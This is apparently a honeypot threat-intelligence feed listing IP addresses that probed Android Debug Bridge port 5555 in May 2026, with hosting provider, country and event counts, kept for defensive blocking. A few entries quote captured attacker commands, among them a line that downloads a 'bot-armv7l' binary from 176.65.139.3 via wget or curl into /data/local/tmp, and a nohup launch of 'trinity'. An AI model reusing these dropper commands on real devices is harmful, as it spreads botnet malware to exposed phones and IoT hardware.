IPv4	67.205.183.150	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-24T17:29:25.000Z \| last_seen=2026-05-24T22:52:36.768Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	66.132.172.129	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-24T18:35:09.000Z \| last_seen=2026-05-24T18:36:33.506Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	205.185.127.191	Attacker IP • ADB / seen in ADBHoney; events=2; ports=5555; cc=US; asn=53667; asn_org=FranTech Solutions; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-24T19:59:03.000Z \| last_seen=2026-05-24T20:00:22.682Z \| ports=5555 \| cc=US \| asn=53667 \| org=FranTech Solutions	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	23.132.164.27	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=60223; asn_org=Netiface Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=170 \| first_seen=2026-05-24T21:50:51.000Z \| last_seen=2026-05-25T19:32:10.020Z \| ports=5555 \| cc=US \| asn=60223 \| org=Netiface Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-24
IPv4	134.122.21.77	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-24T23:45:06.000Z \| last_seen=2026-05-24T23:46:13.578Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	85.217.140.16	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=FR; asn=209334; asn_org=Modat B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-24T23:27:13.000Z \| last_seen=2026-05-24T23:37:16.097Z \| ports=5555 \| cc=FR \| asn=209334 \| org=Modat B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	85.217.140.50	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=FR; asn=209334; asn_org=Modat B.V.; cats=Misc activity; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-24T23:23:34.000Z \| last_seen=2026-05-24T23:33:40.102Z \| ports=5555 \| cc=FR \| asn=209334 \| org=Modat B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	188.166.212.216	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=SG; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-25T00:09:57.000Z \| last_seen=2026-05-25T00:20:11.485Z \| ports=5555 \| cc=SG \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	46.151.182.85	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=205759; asn_org=Ghosty Networks LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-25T00:08:56.000Z \| last_seen=2026-05-25T00:10:03.834Z \| ports=5555 \| cc=NL \| asn=205759 \| org=Ghosty Networks LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	85.11.167.46	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-25T01:56:06.000Z \| last_seen=2026-05-25T01:57:15.523Z \| ports=5555 \| cc=BG \| asn=213438 \| org=ColocaTel Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	198.235.24.79	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-25T03:13:55.000Z \| last_seen=2026-05-25T03:25:27.631Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	185.141.119.105	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=39 \| first_seen=2026-05-25T04:00:55.000Z \| last_seen=2026-05-26T09:52:55.092Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	109.105.211.15	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=PT; asn=21859; asn_org=Zenlayer Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-25T05:57:31.000Z \| last_seen=2026-05-25T05:58:41.248Z \| ports=5555 \| cc=PT \| asn=21859 \| org=Zenlayer Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	65.49.1.172	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-25T06:07:44.000Z \| last_seen=2026-05-25T06:17:54.804Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	65.49.1.178	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-25T06:06:20.000Z \| last_seen=2026-05-25T06:07:24.821Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	45.135.194.113	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-25T13:47:06.000Z \| last_seen=2026-05-25T13:48:11.367Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	45.79.153.51	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-25T15:56:57.000Z \| last_seen=2026-05-25T15:58:05.638Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	46.161.27.65	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=NL; asn=43350; asn_org=NForce Entertainment B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-25T16:04:52.000Z \| last_seen=2026-05-25T16:05:58.452Z \| ports=5555 \| cc=NL \| asn=43350 \| org=NForce Entertainment B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	176.65.139.13	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-25T17:36:56.000Z \| last_seen=2026-05-29T11:56:59.050Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	61.70.80.228	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=TW; asn=9416; asn_org=Hoshin Multimedia Center Inc.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-25T17:21:49.000Z \| last_seen=2026-05-25T17:32:06.044Z \| ports=5555 \| cc=TW \| asn=9416 \| org=Hoshin Multimedia Center Inc.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	198.235.24.229	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-25T18:36:18.000Z \| last_seen=2026-05-25T18:47:48.530Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	159.89.50.9	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-25T19:59:54.000Z \| last_seen=2026-05-25T20:00:58.887Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	66.132.195.83	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-25T19:35:49.000Z \| last_seen=2026-05-25T19:37:14.576Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	85.239.151.41	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=ER; asn=19318; asn_org=Interserver, Inc; adb_cmd_hits=0; cmd=">/data/local/tmp/.gtconfig && cd /data/local/tmp; >/sdcard/0/Downloads/.gtconfig && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulat" Observed in ADBHoney telemetry for 2026-05. events=57 \| first_seen=2026-05-25T19:34:58.000Z \| last_seen=2026-05-31T21:00:24.896Z \| ports=5555 \| cc=ER \| asn=19318 \| org=Interserver, Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	176.65.139.3	Attacker IP • ADB / seen in ADBHoney; events=61; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp; wget -q http://176.65.139.3/bot-armv7l -O .b 2>/dev/null \|\| busybox wget -q http://176.65.139.3/bot-armv7l -O .b 2>/dev/null \|\| curl -s http" Observed in ADBHoney telemetry for 2026-05. events=220 \| first_seen=2026-05-25T21:37:34.000Z \| last_seen=2026-05-27T03:38:03.398Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	205.185.118.149	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=53667; asn_org=FranTech Solutions; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-25T21:04:10.000Z \| last_seen=2026-05-25T21:05:17.626Z \| ports=5555 \| cc=US \| asn=53667 \| org=FranTech Solutions	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-25
IPv4	176.65.132.43	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=20 \| first_seen=2026-05-25T23:12:39.000Z \| last_seen=2026-05-26T16:17:09.506Z \| ports=5555 \| cc=DE \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	64.62.197.2	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-21T12:47:03.000Z \| last_seen=2026-05-26T00:38:27.703Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	64.62.197.8	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-21T12:45:23.000Z \| last_seen=2026-05-26T00:37:21.381Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	45.142.193.53	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-26T04:22:27.000Z \| last_seen=2026-05-26T04:23:32.702Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	112.28.245.59	Attacker IP • ADB / seen in ADBHoney; events=56; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=22; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=56 \| first_seen=2026-05-26T06:28:33.000Z \| last_seen=2026-05-26T06:45:32.537Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd. \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-26
IPv4	142.93.160.51	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-26T06:57:12.000Z \| last_seen=2026-05-26T07:07:29.831Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	31.56.209.8	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=AE; asn=209373; asn_org=Swissnet LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-26T06:02:49.000Z \| last_seen=2026-05-28T14:05:41.740Z \| ports=5555 \| cc=AE \| asn=209373 \| org=Swissnet LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	64.62.197.92	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-26T06:12:48.000Z \| last_seen=2026-05-31T13:48:30.237Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	64.62.197.93	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-26T06:11:37.000Z \| last_seen=2026-05-26T06:12:47.744Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	167.99.156.189	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=19 \| first_seen=2026-05-26T07:04:58.000Z \| last_seen=2026-05-26T07:15:47.432Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	223.113.141.20	Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=CN; asn=56046; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=28; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=63 \| first_seen=2026-05-26T07:00:03.000Z \| last_seen=2026-05-26T07:14:24.859Z \| ports=5555 \| cc=CN \| asn=56046 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-26
IPv4	192.109.200.175	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=51396; asn_org=Pfcloud UG (haftungsbeschrankt); adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=183 \| first_seen=2026-05-26T10:10:45.000Z \| last_seen=2026-05-31T00:52:44.681Z \| ports=5555 \| cc=BG \| asn=51396 \| org=Pfcloud UG (haftungsbeschrankt)	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	222.77.252.140	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-26T10:01:37.000Z \| last_seen=2026-05-26T10:02:40.319Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	94.156.152.234	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=214209; asn_org=Internet Magnate (Pty) Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=12 \| first_seen=2026-05-26T11:38:58.000Z \| last_seen=2026-05-26T15:37:30.676Z \| ports=5555 \| cc=BG \| asn=214209 \| org=Internet Magnate (Pty) Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	193.3.53.6	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=211607; asn_org=Securitytrails, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-26T13:44:00.000Z \| last_seen=2026-05-26T13:45:08.393Z \| ports=5555 \| cc=US \| asn=211607 \| org=Securitytrails, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	172.237.156.206	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-26T16:04:03.000Z \| last_seen=2026-05-26T16:05:06.955Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	187.35.240.173	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=BR; asn=27699; asn_org=TELEFONICA BRASIL S.A; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-26T16:40:23.000Z \| last_seen=2026-05-26T16:50:28.117Z \| ports=5555 \| cc=BR \| asn=27699 \| org=TELEFONICA BRASIL S.A	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	45.79.109.4	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-26T16:03:22.000Z \| last_seen=2026-05-26T16:04:30.070Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	114.98.177.183	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-26T19:24:29.000Z \| last_seen=2026-05-28T10:50:03.859Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	179.43.134.114	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CH; asn=51852; asn_org=Private Layer INC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-26T19:28:35.000Z \| last_seen=2026-05-31T06:45:47.912Z \| ports=5555 \| cc=CH \| asn=51852 \| org=Private Layer INC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	66.132.195.45	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-26T20:30:50.000Z \| last_seen=2026-05-26T20:32:12.761Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-26
IPv4	184.105.247.194	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-27T01:24:11.000Z \| last_seen=2026-05-27T01:34:16.198Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	184.105.247.230	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-27T01:22:55.000Z \| last_seen=2026-05-27T01:23:59.117Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	78.39.252.168	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=IR; asn=58224; asn_org=Iran Telecommunication Company PJS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-27T01:38:14.000Z \| last_seen=2026-05-27T01:43:16.704Z \| ports=5555 \| cc=IR \| asn=58224 \| org=Iran Telecommunication Company PJS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	134.209.82.148	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=NL; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-27T02:18:03.000Z \| last_seen=2026-05-27T02:28:16.041Z \| ports=5555 \| cc=NL \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	91.231.89.114	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-27T02:09:29.000Z \| last_seen=2026-05-27T02:19:39.469Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	91.231.89.204	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-27T02:09:30.000Z \| last_seen=2026-05-27T02:19:51.417Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	198.235.24.40	Attacker IP • ADB / seen in ADBHoney; events=20; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=24 \| first_seen=2026-05-27T04:57:23.000Z \| last_seen=2026-05-27T05:08:52.864Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	138.68.26.195	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-27T05:03:56.000Z \| last_seen=2026-05-27T08:15:00.517Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	45.156.128.56	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=PT; asn=211680; asn_org=Sistemas Informaticos, S.A.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-27T06:04:20.000Z \| last_seen=2026-05-27T06:16:06.975Z \| ports=5555 \| cc=PT \| asn=211680 \| org=Sistemas Informaticos, S.A.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	100.29.192.56	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-27T09:18:05.000Z \| last_seen=2026-05-27T09:19:42.342Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	44.220.185.166	Attacker IP • ADB / seen in ADBHoney; events=55; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=55 \| first_seen=2026-05-27T09:27:37.000Z \| last_seen=2026-05-27T09:38:23.012Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	220.124.173.231	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-27T11:06:50.000Z \| last_seen=2026-05-27T11:17:01.319Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	176.65.139.44	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-27T12:43:45.000Z \| last_seen=2026-05-27T12:44:46.564Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	185.141.119.101	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-27T13:45:18.000Z \| last_seen=2026-05-27T13:55:35.618Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
IPv4	91.223.242.20	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=RU; asn=9130; asn_org=LLC Managing Company Hydraulic Machines and Systems; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-27T13:11:43.000Z \| last_seen=2026-05-27T13:12:48.626Z \| ports=5555 \| cc=RU \| asn=9130 \| org=LLC Managing Company Hydraulic Machines and Systems	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-27
